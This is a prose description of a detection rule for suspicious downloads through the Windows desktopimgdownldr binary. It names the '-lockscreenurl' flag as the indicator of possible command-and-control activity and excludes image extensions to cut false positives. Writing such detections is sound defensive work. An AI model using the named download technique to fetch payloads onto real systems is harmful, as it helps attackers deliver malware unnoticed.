This detection rule identifies the execution of the Microsoft Desktopimgdownldr process when it is used in a suspicious manner, particularly indicating attempts to download files from the Internet. The rule focuses on specific command-line arguments typically associated with unwanted or malicious downloads. It sets a high detection level due to the potential for command-and-control (C&C) behavior commonly observed in threats that utilize file download mechanisms. The rule includes criteria to discern regular execution from suspicious occurrences, specifically looking for the '-lockscreenurl' flag in the command line. Furthermore, it filters out common image file extensions (like '.jpg', '.jpeg', and '.png') to mitigate false positives, allowing detection to focus on potentially harmful operations involving registry modifications. Given the nature of file downloads, environmental context is crucial in assessing the legitimacy of the detection, as ordinary administrative scripts could trigger false alarms. This detection can help in proactive security measures to mitigate risks related to unauthorized file downloads and C&C activities.